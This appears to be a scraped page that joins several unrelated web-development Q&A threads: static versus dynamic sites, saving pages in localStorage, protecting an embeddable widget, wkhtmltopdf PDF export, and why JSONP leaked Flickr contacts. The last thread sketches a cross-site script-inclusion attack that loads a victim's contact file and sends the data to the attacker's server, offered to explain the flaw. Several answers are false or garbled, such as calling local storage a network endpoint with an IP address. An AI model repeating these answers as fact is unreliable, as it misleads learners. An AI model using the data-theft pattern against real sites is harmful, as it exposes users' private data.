I have built my first website. But there are lots of problems, for example when I click poster of article, the data of the clicked poster are loaded to local storage and the opening html page takes these data from local storage and shows. But in that case the unique URL is not generated. every article page has ending article.html. They just loads different data when I click it's poster. I thought maybe there is a way to create new unique html page in your hosting file management system, with Javascript.
There is no way for client-side JavaScript, on its own, to create files on a website.
If this was possible then every major website would find all its content overwritten with whatever random passers by felt like storing.
JavaScript can make HTTP requests to a server (e.g. with the fetch API). You can then process the content of the request with server-side code (written in any programming language you like and that your hosting service supports).
Related
My prof said that dynamic pages get created by the computer, while static pages are created by the user.
Thank you so much!
The difference between static pages and dynamic pages.
a static page has a generic URL suffix, such as .htm, .html, .shtml, and does not contain "?";
Websites using dynamic page skills can perform more functions such as user registration, login, online survey, user management, order management, etc.;
Application and web languages:
Static web pages: HTML, JavaScript, CSS, etc.
Dynamic Web Pages: PHP, CGI, AJAX, ASP, ASP.NET, etc.
Dynamic web pages are used where information changes frequently, such as stock prices, weather information, news and sports news.
Static web pages have fixed content, while dynamic web pages can have changing content.
Static web pages must be modified manually, while changes to a dynamic page can be loaded through an application whose resources are stored in a database.
Static web pages only use a web server, while dynamic web pages use a web server, an application server, and a database.
Regarding: "How to tell if a website is static or dynamic?"
Static websites are simple web pages (typically written in languages like JavaScript, HTML, CSS, etc.) and stored in a web server. In the case of static web pages, as soon as a server receives a request for a page, it immediately sends a response to the client with no additional processing. Users will always view the same content regardless of their location, device type, and web browser.
In static websites, the displayed content remains the same unless someone manually edits the HTML source code on every page that’s part of the website. These pages contain no alterations based on any user input. Hence the name- static web pages. You don't necessarily need any prior experience with database design and web programming to create and maintain a static website. As long as they don't change when we update them, the code for static web pages stays the same.
On the other hand, Dynamic web pages have greater complexity than static ones because they display different content for each user while retaining the same layout and design. A dynamic website generates web pages in real-time. The flexible nature of the content allows for customization based on the requests from the user or the browser used by them. Such pages are usually written in languages like CGI, AJAX, ASP or ASP.NET, and they usually take more time to load than static web pages. They are frequently implemented to show information that changes frequently, e.g., weather updates, stock prices, etc.
Server-side code used to construct a dynamic web page can generate real-time HTML pages for each request from an individual user. While static websites are mostly informational, dynamic websites contain interactive, continually changing elements. In order to provide an interactive website experience for visitors, web developers usually combine both client-side and server-side programming techniques.
Dynamic web pages usually contain application programs for various services and require server-side resources like databases. A dynamic website accesses content from a CMS (Content Management System), which means that the website reflects any changes made in the database content. These sites use client-side scripting, server-side scripting, or both for generating content. Separating the site’s design from its content makes it easier for web designers to create pages without having to worry about formatting issues. After uploading content into the database, websites retrieve their content from there when responding to user requests.
Now, regarding "Would www.tagpro.gg (the homepage) be static or dynamic?"
I have visited the homepage and it is a dynamic webpage actually as you mentioned.
My prof said that dynamic pages get created by the computer, while static pages are created by the user.
Well, actually also static pages can be generated by the computer, since there are a lot of static sites generators out there. Take for example https://astro.build or https://gohugo.io
Would www.tagpro.gg be static or dynamic?
You are right, it is dynamic, since you can see a login/sign-up feature on the page. That's nothing you can achieve with a 100% static site.
Its very simple... Only major two factors matter -
A static website does not have artificial intelligence means it cannot add something automatically the user has to type the code for that is he wants to do so but a dynamic website can do it on its own.
A static website cannot store a information means it only includes frontend no backend no php, node.js or something like that. In simpler words if user signin to your website you would not able to store his username and password.
so I have seen a lot of people using local storage to store certain parts of a web page but not an entire web page is it possible? , if so how? , if not is there a way to store an entire web pages data so the user can come back to it how they left it?
This can be done if you use javascript to save document.body.innerHTML into the webstorage and you use javascript to load it back from the storage when the page is loaded next time. If the web page is not in the webstorage, you could redirect the user to the web page.
But this depends on the design of your web page and if there is session index etc in the body of the web page.
You should also think of some way to handle versions. You dont want your users only use the cached version of your web page, but it should be updated once you update your web page.
The session storage is ~5mbit, so you cant save very much, especially not pictures.
Since LocalStorage allows you to store about 5MB~ you can store a full webpage there and then just call it into a document.write().
The following code does it:
Storing it:
var HTML = ""; //html of the page goes here
localStorage.setItem("content", HTML);
Retrieving it:
document.write(localStorage['content']);
Although this is possible it is common practice you only save settings and load them up into the right elements rather than the entire web page.
This is not really answering your question, but, if you are only curious how this can be done and don't need to have wide browser support, I suggest you look into Service Workers, as making websites offline is something that they solve very well.
One of their many capabilities is that they can act as a proxy for any request your website makes, and respond with locally saved data, instead of going to the server.
This allows you to write your application code exactly the same way as you would normally, with the exception of initializing the ServiceWorker (this is done only once)
https://developers.google.com/web/fundamentals/getting-started/primers/service-workers
https://jakearchibald.github.io/isserviceworkerready/
Local storage it's actually just an endpoint: has an IP address and can be accessed from the web.
First of all, you need to make sure that you're DNS service points on your Index page.
For example, if your Local-storage's ip is 10.10.10.10 and the files on that local-storage is organized like:
contants:
pages:
index.html
page2.html
images:
welcome.png
So you can point your DNS like:
10.10.10.10/index -> /contants/pages/index.html
In most of the web frameworks (web framework it's a library that provide built in tools that enable you to build your web site with more functionality and more easily) their is a built in module called 'route' that provide more functionality like this.
In that way, from you index.html file you can import the entire web site, for example:
and in your routes you define for example:
For all the files with the .html extension, route to -> 10.10.10.10/contants/pages/
For all the files with the .png/.jpg extension, route to -> 10.10.10.10/contants/images/
Local storage is usually for storing key and value pairs, storing a whole page will be a ridiculous idea. Try instead a Ajax call which Returns an partial view. Use that for the purpose of manipulation in DOM
I'm building a website that is functionally similar to Google Analytics. I'm not doing analytics, but I am trying to provide either a single line of javascript or a single line iframe that will add functionality to other websites.
Specifically, the embedded content will be a button that will popup a new window and allow the user to perform some actions. Eventually the user will finish and the window will close, at which point the button will update to a new element reflecting that the user completed the flow.
The popup window will load content from my site, but my question pertains to the embedded line of javascript (or the iframe). What's the best practice way of doing this? Google analytics and optimizely use javascript to modify the host page. Obviously an iFrame would work too.
The security concern I have is that someone will copy the embed code from one site and put it on another. Each page/site combination that implements my script/iframe is going to have a unique ID that the site's developers will generate from an authenticated account on my site. I then supply them with the appropriate embed code.
My first thought was to just use an iframe that loads a page off my site with url parameters specific to the page/site combo. If I go that route, is there a way to determine that the page is only loaded from an iframe embedded on a particular domain or url prefix? Could something similar be accomplished with javascript?
I read this post which was very helpful, but my use case is a bit different since I'm actually going to pop up content for users to interact with. The concern is that an enemy of the site hosting my embed will deceptively lure their own users to use the widget. These users will believe they are interacting with my site on behalf of the enemy site but actually be interacting on behalf of the friendly site.
If you want to keep it as a simple, client-side only widget, the simple answer is you can't do it exactly like you describe.
The two solutions that come to mind for this are as follows, the first being a compromise but simple and the second being a bit more involved (for both you and users of your widget).
Referer Check
You could validate the referer HTTP header to check that the domain matches the one expected for the particular Site ID, but keep in mind that not all browsers will send this (and most will not if the referring page is HTTPS) and that some browser privacy plugins can be configured to withhold it, in which case your widget would not work or you would need an extra, clunky, step in the user experience.
Website www.foo.com embeds your widget using say an embedded script <script src="//example.com/widget.js?siteId=1234&pageId=456"></script>
Your widget uses server side code to generate the .js file dynamically (e.g. the request for the .js file could follow a rewrite rule on your server to map to a PHP / ASPX).
The server side code checks the referer HTTP header to see if it matches the expected value in your database.
On match the widget runs as normal.
On mismatch, or if the referer is blank/missing, the widget will still run, but there will be an extra step that asks the user to confirm that they have accessed the widget from www.foo.com
In order for the confirmation to be safe from clickjacking, you must open the confirmation step in a popup window.
Server Check
Could be a bit over engineered for your purposes and runs the risk of becoming too complicated for clients who wish to embed your widget - you decide.
Website www.foo.com wants to embed your widget for the current page request it is receiving from a user.
The www.foo.com server makes an API request (passing a secret key) to an API you host, requesting a one time key for Page ID 456.
Your API validates the secret key, generates a secure one time key and passes back a value whilst recording the request in the database.
www.foo.com embeds the script as follows <script src="//example.com/widget.js?siteId=1234&oneTimeKey=231231232132197"></script>
Your widget uses server side code to generate the js file dynamically (e.g. the .js could follow a rewrite rule on your server to map to a PHP / ASPX).
The server side code checks the oneTimeKey and siteId combination to check it is valid, and if so generates the widget code and deletes the database record.
If the user reloads the page the above steps would be repeated and a new one time key would be generated. This would guard against evil.com from page scraping the embed code and parameters.
The response here is very thorough and provides lots of great information and ideas. I solved this problem by validating X-Frame-Options headers on the server-side , though the support for those is incomplete in browsers and possibly spoofable.
I'm having issues trying to figure out how to generate on server side a PDF from a javascript-heavy webpage that is served from Tomcat (the application is Pentaho CE). The content is a dashboard that responds to user interaction. Pentaho (the application) replaces divs dynamically with various content through AJAX calls. I'd like to export to pdf whatever state the user has the dashboard at. There are no restrictions on what I can put on the server, but I need to avoid having the client install anything.
I've taken a look at this, along with a bunch of other google-fu:
JSP/HTML Page to PDF conversion
wkhtmltopdf seems to be a popular choice; before I start banging my head against it, I have a few questions:
Can wkhtmltopdf handle going to password protected jsps where authentication is handled by the application? Would the dynamically loaded divs break it?
Is there a way to perhaps return the client view to the server for processing? I read about screen capturing...
Another option that could work out would be to automate a local access to the dashboard on the server through a server-hosted web browser and generate a PDF that way...is this possible, given the constraints of Tomcat and password protection that's handled by the application? The javascript components that Pentaho generates cannot be accessed outside of the application.
Thanks!
EDIT:
Good news! wkhtmltopdf works! Kind of. I got past the password authentication through putting the login details through a query string, and I'm getting a pdf of the correct page now. The issue is that no javascript components are showing up... (they work for pages like yahoo.com, so maybe I'm missing something here).
If you have a lot of AJAX calls you should wait for them. Use the --javascript-delay x argument, where is x is the time to wait.
This flickr blog post discusses the thought behind their latest improvements to the people selector autocomplete.
One problem they had to overcome was how to parse and otherwise handle so much data (i.e., all your contacts) client-side. They tried getting XML and JSON via AJAX, but found it too slow. They then had this to say about loading the data via a dynamically generated script tag (with callback function):
JSON and Dynamic Script Tags: Fast but Insecure
Working with the theory that large
string manipulation was the problem
with the last approach, we switched
from using Ajax to instead fetching
the data using a dynamically generated
script tag. This means that the
contact data was never treated as
string, and was instead executed as
soon as it was downloaded, just like
any other JavaScript file. The
difference in performance was
shocking: 89ms to parse 10,000
contacts (a reduction of 3 orders of
magnitude), while the smallest case of
172 contacts only took 6ms. The parse
time per contact actually decreased
the larger the list became. This
approach looked perfect, except for
one thing: in order for this JSON to
be executed, we had to wrap it in a
callback method. Since it’s executable
code, any website in the world could
use the same approach to download a
Flickr member’s contact list. This was
a deal breaker. (emphasis mine)
Could someone please go into the exact security risk here (perhaps with a sample exploit)? How is loading a given file via the "src" attribute in a script tag different from loading that file via an AJAX call?
This is a good question and this exact sort of exploit was once used to steal contact lists from gmail.
Whenever a browser fetches data from a domain, it send across any cookie data that the site has set. This cookie data can then used to authenticate the user, and fetch any specific user data.
For example, when you load a new stackoverflow.com page, your browser sends your cookie data to stackoverflow.com. Stackoverflow uses that data to determine who you are, and shows the appropriate data for you.
The same is true for anything else that you load from a domain, including CSS and Javascript files.
The security vulnerability that Flickr faced was that any website could embed this javascript file hosted on Flickr's servers. Your Flickr cookie data would then be sent over as part of the request (since the javascript was hosted on flickr.com), and Flickr would generate a javascript document containing the sensitive data. The malicious site would then be able to get access to the data that was loaded.
Here is the exploit that was used to steal google contacts, which may make it more clear than my explanation above:
http://blogs.zdnet.com/Google/?p=434
If I was to put an HTML page on my website like this:
<script src="http://www.flickr.com/contacts.js"></script>
<script> // send the contact data to my server with AJAX </script>
Assuming contacts.js uses the session to know which contacts to send, I would now have a copy of your contacts.
However if the contacts are sent via JSON, I can't request them from my HTML page, because it would be a cross-domain AJAX request, which isn't allowed. I can't request the page from my server either, because I wouldn't have your session ID.
In plain english:
Unauthorised computer code (Javascript) running on people's computers is not allowed to get data from anywhere but the site on which it runs - browsers are obliged to enforce this rule.
There is no corresponding restriction on where code can be sourced from, so if you embed data in code any website the user visits can employ the user's credentials to obtain the user's data.